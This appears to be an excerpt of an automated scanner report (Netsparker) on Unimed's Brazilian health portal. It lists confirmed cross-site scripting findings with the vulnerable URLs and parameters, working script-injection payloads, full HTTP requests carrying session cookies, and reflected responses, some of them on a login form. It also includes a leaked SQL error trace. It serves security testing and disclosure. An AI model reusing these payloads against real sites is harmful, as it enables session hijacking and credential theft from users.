org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:423) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>root cause</b> <pre>java.sql.SQLException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27' at line 1&quot; com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1997) com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:1167) com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:1278) com.mysql.jdbc.MysqlIO.sqlQuery(MysqlIO.java:1224) com.mysql.jdbc.Connection.execSQL(Connection.java:2244) com.mysql.jdbc.Connection.execSQL(Connection.java:2192) com.mysql.jdbc.Statement.executeQuery(Statement.java:1163) org.jboss.resource.adapter.jdbc.WrappedStatement.executeQuery(WrappedStatement.java:208) br.com.unimed.portal.veiculocomunicacao.dao.ComunicacaoDAO.populaComunicacao(ComunicacaoDAO.java:459) br.com.unimed.portal.veiculocomunicacao.action.DetalheAction.execute(DetalheAction.java:28) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:421) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.9 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.9</h3></body></html>
Cross-site Scripting

Cross-site Scripting

8 TOTAL
IMPORTANT
CONFIRMED
8
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /pctr/layout/layout_2005/form_login.jsp

/pctr/layout/layout_2005/form_login.jsp CONFIRMED

https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
cd_canal GET '"--></style></script><script>alert(0x002E21)</script>
cd_secao GET null
seguro GET sim

Request

GET /pctr/layout/layout_2005/form_login.jsp?cd_canal='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x002E21)%3C/script%3E&cd_secao=null&seguro=sim HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=F8BA8DAA8C7025EA3ED9FD61BFFA18B7.dcpr5033; JSESSIONID=D118DF4DAD9B17FCF693AB7EA859B09A.dcpr5033; JSESSIONID=EB79086C998D8A280896969706D1B054.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:06:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Content-Length: 3355
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Portal Nacional de Saúde :: Unimed do Brasil</title>
<link href="/pctr/layout/layout_2005/css/topo.css" rel="stylesheet" type="text/css">
</head>
<body style="background-color:transparent;" onload="javascript:setaFoco();">
<script language="JavaScript" type="text/javascript" src="/portal/comum/scripts/form.js"></script>
<script language="JavaScript" type="text/javascript">
<!--
function validar() {
if (validarPreenchimento(document.login.ds_login, "Por favor, digite seu login.")) {
if (validarPreenchimento(document.login.ds_senha, "Por favor, digite sua senha.")) {
document.login.submit();
}
}
}

function seguro() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") == -1) {
var endereco = "https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal='"--></style></script><script>netsparker(0x002E21)</script>";
var cd_secao = "null";
if (cd_secao != "null") {
endereco = endereco + "&cd_secao=null";
}
endereco = endereco + "&seguro=sim";
document.location = endereco;
window.focus();

}
}

function setaFoco() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") > -1) {
document.login.ds_login.focus();
}
}

function verCertificado() {
var URL = "https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
var W = "500";
var H = "510";
var S = "no";

var Wpopupsize =(W/2);
var Hpopupsize =(H/2);
var CenterPopUpX = (screen.width/2)-(Wpopupsize);
var CenterPopUpY = (screen.height/2)-(Hpopupsize);
var pos = "left="+CenterPopUpX+",top="+CenterPopUpY;
var desktop = window.open(URL, "preview", "width="+W+",height="+H+",toolbar=no,location=no,status=no,menubar=no,scrollbar s="+S+",resizable=no,"+pos);

// parent.location.href="https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
}


-->
</script>
<div class="loginBox" style="position:absolute; top:0; margin:0; left:0;">
<div class="restrito">Área restrita para colaboradores e cooperados:</div>
<form method="POST" name="login" action="https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario" target="_top">
<input type="hidden" name="secao_ativa" value="null" />
<input type="hidden" name="cd_canal" value="'"--></style></script><script>netsparker(0x002E21)</script>" />
<input type="hidden" name="kitsite" value="null" />
Login:
<input type="text" class="textBox" name="ds_login">
Senha:
<input type="password" class="textBox" name="ds_senha">
<a href="javascript:validar()"><img id="botaook" src="/pctr/layout/layout_2005/imgs/button/bt-ok.png" border="0"></a>
</form>
<div class="esqueci"><span style="float: left; margin-left: 110px;"><a href="/pct/index.jsp?cd_canal='"--></style></script><script>netsparker(0x002E21)</script>&amp;cd_secao=49101" target="_top">Cadastre-se aqui</a></span> | <a href="/pct/index.jsp?cd_canal='"--></style></script><script>netsparker(0x002E21)</script>&amp;cd_secao=49144" target="_top">Esqueci minha senha</a></div>
</div>
</body>
</html>
- /pct/index.jsp

/pct/index.jsp CONFIRMED

http://www.unimed.com.br/pct/index.jsp?cd_canal=54593&cd_secao=60549&codigoUnimed=%22%20stYle=%22x:e..

Parameters

Parameter Type Value
cd_canal GET 54593
cd_secao GET 60549
codigoUnimed GET " stYle="x:expre/**/ssion(alert(9))

Request

GET /pct/index.jsp?cd_canal=54593&cd_secao=60549&codigoUnimed=%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=A46E26A0E34BFFD7FEB48B72074C28D0.dcpr5033; JSESSIONID=EB79086C998D8A280896969706D1B054.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:06:10 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta name="verify-v1" content="ePcmMNKH7QZwOr8Waa3OWwOX7LqBztu2DnCzHaKIuYs=" >
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="keywords" content="unimed, portal, saude, medicina, planos, guia médico, brasil" />
<meta name="description" content="" />
<meta name="author" content="Dynamix Software - http://www.dynamix.com.br" />

<title>Portal Nacional de Saúde :: UNIMED PONTA GROSSA :: O que é RSS ?</title>

<!-- ini tema -->
<link href="/pct/tema/2009-kit-site/estilo.css?8" rel="stylesheet" type="text/css" media="screen" />
<link href="/pct/tema/2009-kit-site/estilo_impressao.css?1" rel="stylesheet" type="text/css" media="print" />
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="/pct/tema/2009-kit-site/estilo_ie7.css?3" media="screen" /><![endif]-->
<!-- fim tema -->

<script type="text/javascript" src="/portal/comum/scripts/swfobject.js"></script>
<script type="text/javascript" src="/pct/comum/js/jquery-latest.js"></script>
<script type="text/javascript" src="/pct/layout/2009-kit-site/js/acessibilidade.js"></script>
<script type="text/javascript" src="/pct/layout/2009-kit-site/js/funcoes.js"></script>
<script type="text/javascript" src="/pct/comum/js/myJsEvents.js"></script>
<script type="text/javascript" language="JavaScript" src="/pct/layout/2009-kit-site/js/jumpmenu.js"></script>
<script type="text/javascript">
<!--
var myEvent = new MyJsEvents();
myEvent.addOnLoadEvent(loadAcessibilidade);
myEvent.addOnLoadEvent(onloadObject);
myEvent.addOnUnloadEvent(onunloadObjects);
myEvent.triggerEvent();
//-->
</script>
</head>




<!-- abre limites -->
<div id="limites">
<!-- ini topo -->
















<script language="JavaScript" type="text/javascript" src="/portal/comum/scripts/form.js"></script>
<script type="text/javascript">
<!--
$(document).ready(function(){
$("#frmbusca").submit(function(){
if( $("#query").val() == "Digite a palavra" ) {
alert("Informe a palavra a ser buscada.");
return false;
}
});
});

$(document).ready(function(){
setaFoco();
});

function validar() {
if (validarPreenchimento(document.login.ds_login, "Por favor, digite seu login.")) {
if (validarPreenchimento(document.login.ds_senha, "Por favor, digite sua senha.")) {
document.login.submit();
}
}
}

function seguro() {
var urlAtual = location.href;
if (urlAtual.indexOf("&seguro=sim") == -1) {
document.location = "https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao=60549&seguro=sim";
window.focus();

}
}

function setaFoco() {
var urlAtual = location.href;
if (urlAtual.indexOf("&seguro=sim") > -1) {
document.login.ds_login.focus();
}
}
//-->
</script>
<style>img { border: none; }</style>

<!-- abre topo -->
<div id="topo">
<ul class="acessibilidade">

<li class="mapasite"><a href="./index.jsp?cd_canal=54593&cd_secao=49104" title="Mapa do site">Mapa do site</a></li>
<li><a href="./index.jsp?cd_canal=49146" title="Visitar o site da Unimed Brasil">Unimed Brasil</a></li>
<br/>
<li class="oquerss">
<a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=54593&cd_secao=60549&codigoUnimed=69"
title="O que é RSS ?">O que é RSS ?</a>
</li>
<li>
<a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=54593&cd_secao=61759&codigoUnimed=69"
class="widget" title="Widget">Widget</a>
</li>

</ul>
<div id="informacoes">
<div class="esquerda">
<p>Para aumentar ou diminuir a visualização do conteúdo, segure a tecla "ctrl" e pressione + ou - no seu teclado.</p>
<p class="centro"><img src="/pct/layout/2009-kit-site/imagens/acessibilidade_zoom.png" alt="Segure CTRL, aperte + para aumentar ou - para diminuir o tamanho da letra " /></p>
</div>
<div class="direita">
<p>Se preferir, use as teclas de atalho (acesskeys) para facilita sua navegação:</p>
<ul class="instrucoes">
<li>No Internet Explorer segure "ALT" mais a tecla desejada;</li>
<li>Em outros navegadores, segure "ALT + SHIFT" e a tecla correspondente.</li>
</ul>
<ul>
<li><a href="#topo" title="Topo" accesskey="t">Alt + T - Topo</a></li>
<li><a href="#frmbusca" title="Busca" accesskey="b">Alt + B - Busca</a></li>
<li><a href="#navegacao" title="Navegação" accesskey="m">Alt + M - Menu</a></li>
<li><a href="#conteudo" title="Conteúdo" accesskey="c">Alt + C - Conteúdo</a></li>
</ul>
</div>
</div>

<!-- inserir o código para recuperar itens do logotipo da Unimed -->


<h2 ><a href="./index.jsp?cd_canal=54593" title="Voltar à página inicial"></a></h2>

<div class="kit"><a href="./index.jsp?cd_canal=54593">Ponta Grossa</a></div>




<!-- inserir o código para recuperar itens da área restrita -->

<form id="frmrestrita" name="login" action="https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario" target="_top" method="post">
<fieldset>
<legend><span>Área restrita:</span></legend>
<input type="hidden" name="secao_ativa" value="null" />
<input type="hidden" name="cd_canal" value="54593" />
<input type="hidden" name="kitsite" value="null" />
<div class="inputWrapper">
<input type="text" name="ds_login" id="usuario" onfocus="javascript:limparNoFocus('Usuário', 'text', this);" onblur="javascript:escreverNoBlur('Usuário', 'text', this);" value="Usuário" />
</div>
<div class="inputWrapper">
<input type="text" id="mockpass" class="mock" value="Senha" onFocus="document.getElementById('mockpass').style.display='none'; document.getElementById('realpass').style.display='inline'; document.getElementById('realpass').focus();"><input type="password" name="ds_senha" id="realpass" class="real" style="display: none;" onBlur="if(this.value=='') {document.getElementById('mockpass').style.display='inline'; document.getElementById('realpass').style.display='none';}">
</div>
<button type="button" onclick="javascript: validar();">ok</button>
<ul class="opcoes_acesso">
<li><a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49144" title="Receber sua senha por e-mail" target="_top">Esqueci a senha</a></li>
<li><a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49101" target="_top" title="Cadastro de colaborador">Cadastre-se</a></li>
</ul>
</fieldset>
</form>


<form id="frmbusca" action="./index.jsp?cd_canal=54593&cd_secao=49103" method="post">
<fieldset>
<input type="hidden" name="cd_canal" value="54593" />
<label for="busca" class="lbbusca">Busca no site:</label>
<div class="inputWrapper">
<input type="text" onfocus="javascript:limparNoFocus('Digite a palavra', 'text', this);" onblur="javascript:escreverNoBlur('Digite a palavra', 'text', this);" name="query" id="query" value="Digite a palavra" />
</div>
<button type="submit">ok</button>
</fieldset>
</form>

<ul id="navegacao">



<li class="primeiro "><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54576" title="Visitar a seção Unimed">Unimed <span>Unimed</span></a></li>








<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54785" title="Visitar a seção Atendimento">Atendimento <span>Atendimento</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54586" title="Visitar a seção Serviços">Serviços <span>Serviços</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=63843" title="Visitar a seção HGU">HGU <span>HGU</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=49111" title="Visitar a seção Agência Unimed de Notícias">Agência Unimed de Notícias <span>Agência Unimed de Notícias</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54584" title="Visitar a seção Guia Médico">Guia Médico <span>Guia Médico</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54587" title="Visitar a seção Ouvidoria">Ouvidoria <span>Ouvidoria</span></a></li>




</ul>
</div>
<!-- fecha topo -->

<script type="text/javascript">
$(document).ready(function(){
var secaoAberto = '-1';
var subContents = $('#navegacao li');
for( var i = 0; i < subContents.length; i++ ) {
if( subContents[i].firstChild.href.indexOf(secaoAberto) != -1 ) {
var clazz = subContents[i].className;
clazz += " ativo";
subContents[i].className = clazz;
}
}
});
</script>



<!-- fim topo -->

<!-- ini corpo -->



<center>
<iframe id="iFrameRSS" src="http://www.unimed.com.br/rss?iFrame=true&codigoUnimed=" stYle="x:expre/**/ssion(netsparker(9))" width="990" height="740" frameborder="0"></iframe>
</center>
<!-- fim corpo -->

<!-- ini rodape -->







<div id="rodape">

<div id="hcard-unimed" class="vcard">

<span class="adr">
<strong>Endereço:</strong> <span class="street-address">Rua Santos Dumont, 1036</span> - <span class="locality">Ponta Grossa</span> - <span class="region">PR</span> - CEP: <span class="postal-code">84.010-360</span> <span class="country-name">Brasil</span>
</span>
<div class="org">Unimed Ponta Grossa</div>

</div>


<ul>



<li class="primeiro"><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54576" title="Visitar a seção Unimed">Unimed</a></li>








<li><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54785" title="Visitar a seção Atendimento">Atendimento</a></li>







<li><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54586" title="Visitar a seção Serviços">Serviços</a></li>







<li><a href="./index.jsp?cd_canal=54593&amp;cd_secao=63843" title="Visitar a seção HGU">HGU</a></li>







<li><a href="./index.jsp?cd_canal=54593&amp;cd_secao=49111" title="Visitar a seção Agência Unimed de Notícias">Agência Unimed de Notícias</a></li>







<li><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54584" title="Visitar a seção Guia Médico">Guia Médico</a></li>







<li><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54587" title="Visitar a seção Ouvidoria">Ouvidoria</a></li>




</ul>

<p id="meta">
<strong><a href="./index.jsp?cd_canal=54593&cd_secao=49145&cd_materia=79038" title="Ver nossa política de privacidade">Política de privacidade</a></strong>
<strong><a href="./index.jsp?cd_canal=54593&cd_secao=61703" title="Acessar a seção Termo de Uso">Termo de Uso</a></strong>
2011 Copyright - Todos os direitos reservados.
</p>
</div>
<!-- fecha rodapé -->

<!-- fim rodape -->

</div>
<!-- fecha limites -->

<!-- snippet -->









<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script> <script type="text/javascript"> try { _uacct="UA-2096337-1"; urchinTracker(); } catch( e ) { } </script>

<script type="text/javascript">
// carregar jumpmenu
try {
if( load_jump_menu ) {
load_jump_menu();
}
}
catch(e){}
</script>

</body>
</html>
- /pctr/layout/layout_2005/form_login.jsp

/pctr/layout/layout_2005/form_login.jsp CONFIRMED

https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao='%22--%3E%3..

Parameters

Parameter Type Value
cd_canal GET 54593
cd_secao GET '"--></style></script><script>alert(0x002E34)</script>
seguro GET sim

Request

GET /pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x002E34)%3C/script%3E&seguro=sim HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=F8BA8DAA8C7025EA3ED9FD61BFFA18B7.dcpr5033; JSESSIONID=E305F715B14D3FFB0B59CBCFD42B01C8.dcpr5034; JSESSIONID=44AC3A8F7E70B43EFA1CE7C0517CA78E.dcpr5034; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:06:17 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Content-Length: 3249
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Portal Nacional de Saúde :: Unimed do Brasil</title>
<link href="/pctr/layout/layout_2005/css/topo.css" rel="stylesheet" type="text/css">
</head>
<body style="background-color:transparent;" onload="javascript:setaFoco();">
<script language="JavaScript" type="text/javascript" src="/portal/comum/scripts/form.js"></script>
<script language="JavaScript" type="text/javascript">
<!--
function validar() {
if (validarPreenchimento(document.login.ds_login, "Por favor, digite seu login.")) {
if (validarPreenchimento(document.login.ds_senha, "Por favor, digite sua senha.")) {
document.login.submit();
}
}
}

function seguro() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") == -1) {
var endereco = "https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593";
var cd_secao = "'"--></style></script><script>netsparker(0x002E34)</script>";
if (cd_secao != "null") {
endereco = endereco + "&cd_secao='"--></style></script><script>netsparker(0x002E34)</script>";
}
endereco = endereco + "&seguro=sim";
document.location = endereco;
window.focus();

}
}

function setaFoco() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") > -1) {
document.login.ds_login.focus();
}
}

function verCertificado() {
var URL = "https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
var W = "500";
var H = "510";
var S = "no";

var Wpopupsize =(W/2);
var Hpopupsize =(H/2);
var CenterPopUpX = (screen.width/2)-(Wpopupsize);
var CenterPopUpY = (screen.height/2)-(Hpopupsize);
var pos = "left="+CenterPopUpX+",top="+CenterPopUpY;
var desktop = window.open(URL, "preview", "width="+W+",height="+H+",toolbar=no,location=no,status=no,menubar=no,scrollbar s="+S+",resizable=no,"+pos);

// parent.location.href="https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
}


-->
</script>
<div class="loginBox" style="position:absolute; top:0; margin:0; left:0;">
<div class="restrito">Área restrita para colaboradores e cooperados:</div>
<form method="POST" name="login" action="https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario" target="_top">
<input type="hidden" name="secao_ativa" value="null" />
<input type="hidden" name="cd_canal" value="54593" />
<input type="hidden" name="kitsite" value="null" />
Login:
<input type="text" class="textBox" name="ds_login">
Senha:
<input type="password" class="textBox" name="ds_senha">
<a href="javascript:validar()"><img id="botaook" src="/pctr/layout/layout_2005/imgs/button/bt-ok.png" border="0"></a>
</form>
<div class="esqueci"><span style="float: left; margin-left: 110px;"><a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49101" target="_top">Cadastre-se aqui</a></span> | <a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49144" target="_top">Esqueci minha senha</a></div>
</div>
</body>
</html>
- /pct/index.jsp

/pct/index.jsp CONFIRMED

http://www.unimed.com.br/pct/index.jsp?cd_canal=54593&cd_secao=54585&listagem=true&aprovadas=%3E%3C/..

Parameters

Parameter Type Value
cd_canal GET 54593
cd_secao GET 54585
listagem GET true
aprovadas GET ></script><script>alert(9)</script>

Request

GET /pct/index.jsp?cd_canal=54593&cd_secao=54585&listagem=true&aprovadas=%3E%3C/script%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=7A78C6A904D7A64C00E47D3D7F41A0F0.dcpr5033; JSESSIONID=03AA00FF099E278E473F19259B1B8C0F.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:08:03 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta name="verify-v1" content="ePcmMNKH7QZwOr8Waa3OWwOX7LqBztu2DnCzHaKIuYs=" >
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="keywords" content="unimed, portal, saude, medicina, planos, guia médico, brasil" />
<meta name="description" content="" />
<meta name="author" content="Dynamix Software - http://www.dynamix.com.br" />

<title>Portal Nacional de Saúde :: UNIMED PONTA GROSSA :: Notícias</title>

<!-- ini tema -->
<link href="/pct/tema/2009-kit-site/estilo.css?8" rel="stylesheet" type="text/css" media="screen" />
<link href="/pct/tema/2009-kit-site/estilo_impressao.css?1" rel="stylesheet" type="text/css" media="print" />
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="/pct/tema/2009-kit-site/estilo_ie7.css?3" media="screen" /><![endif]-->
<!-- fim tema -->

<script type="text/javascript" src="/portal/comum/scripts/swfobject.js"></script>
<script type="text/javascript" src="/pct/comum/js/jquery-latest.js"></script>
<script type="text/javascript" src="/pct/layout/2009-kit-site/js/acessibilidade.js"></script>
<script type="text/javascript" src="/pct/layout/2009-kit-site/js/funcoes.js"></script>
<script type="text/javascript" src="/pct/comum/js/myJsEvents.js"></script>
<script type="text/javascript" language="JavaScript" src="/pct/layout/2009-kit-site/js/jumpmenu.js"></script>
<script type="text/javascript">
<!--
var myEvent = new MyJsEvents();
myEvent.addOnLoadEvent(loadAcessibilidade);
myEvent.addOnLoadEvent(onloadObject);
myEvent.addOnUnloadEvent(onunloadObjects);
myEvent.triggerEvent();
//-->
</script>
</head>


<link href="/pct/tema/2009-kit-site/estilo_paginas.css" rel="stylesheet" type="text/css" media="screen" /><body id="interna">

<!-- abre limites -->
<div id="limites">
<!-- ini topo -->
















<script language="JavaScript" type="text/javascript" src="/portal/comum/scripts/form.js"></script>
<script type="text/javascript">
<!--
$(document).ready(function(){
$("#frmbusca").submit(function(){
if( $("#query").val() == "Digite a palavra" ) {
alert("Informe a palavra a ser buscada.");
return false;
}
});
});

$(document).ready(function(){
setaFoco();
});

function validar() {
if (validarPreenchimento(document.login.ds_login, "Por favor, digite seu login.")) {
if (validarPreenchimento(document.login.ds_senha, "Por favor, digite sua senha.")) {
document.login.submit();
}
}
}

function seguro() {
var urlAtual = location.href;
if (urlAtual.indexOf("&seguro=sim") == -1) {
document.location = "https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao=54585&seguro=sim";
window.focus();

}
}

function setaFoco() {
var urlAtual = location.href;
if (urlAtual.indexOf("&seguro=sim") > -1) {
document.login.ds_login.focus();
}
}
//-->
</script>
<style>img { border: none; }</style>

<!-- abre topo -->
<div id="topo">
<ul class="acessibilidade">

<li class="mapasite"><a href="./index.jsp?cd_canal=54593&cd_secao=49104" title="Mapa do site">Mapa do site</a></li>
<li><a href="./index.jsp?cd_canal=49146" title="Visitar o site da Unimed Brasil">Unimed Brasil</a></li>
<br/>
<li class="oquerss">
<a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=54593&cd_secao=60549&codigoUnimed=69"
title="O que é RSS ?">O que é RSS ?</a>
</li>
<li>
<a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=54593&cd_secao=61759&codigoUnimed=69"
class="widget" title="Widget">Widget</a>
</li>

</ul>
<div id="informacoes">
<div class="esquerda">
<p>Para aumentar ou diminuir a visualização do conteúdo, segure a tecla "ctrl" e pressione + ou - no seu teclado.</p>
<p class="centro"><img src="/pct/layout/2009-kit-site/imagens/acessibilidade_zoom.png" alt="Segure CTRL, aperte + para aumentar ou - para diminuir o tamanho da letra " /></p>
</div>
<div class="direita">
<p>Se preferir, use as teclas de atalho (acesskeys) para facilita sua navegação:</p>
<ul class="instrucoes">
<li>No Internet Explorer segure "ALT" mais a tecla desejada;</li>
<li>Em outros navegadores, segure "ALT + SHIFT" e a tecla correspondente.</li>
</ul>
<ul>
<li><a href="#topo" title="Topo" accesskey="t">Alt + T - Topo</a></li>
<li><a href="#frmbusca" title="Busca" accesskey="b">Alt + B - Busca</a></li>
<li><a href="#navegacao" title="Navegação" accesskey="m">Alt + M - Menu</a></li>
<li><a href="#conteudo" title="Conteúdo" accesskey="c">Alt + C - Conteúdo</a></li>
</ul>
</div>
</div>

<!-- inserir o código para recuperar itens do logotipo da Unimed -->


<h2 ><a href="./index.jsp?cd_canal=54593" title="Voltar à página inicial"></a></h2>

<div class="kit"><a href="./index.jsp?cd_canal=54593">Ponta Grossa</a></div>




<!-- inserir o código para recuperar itens da área restrita -->

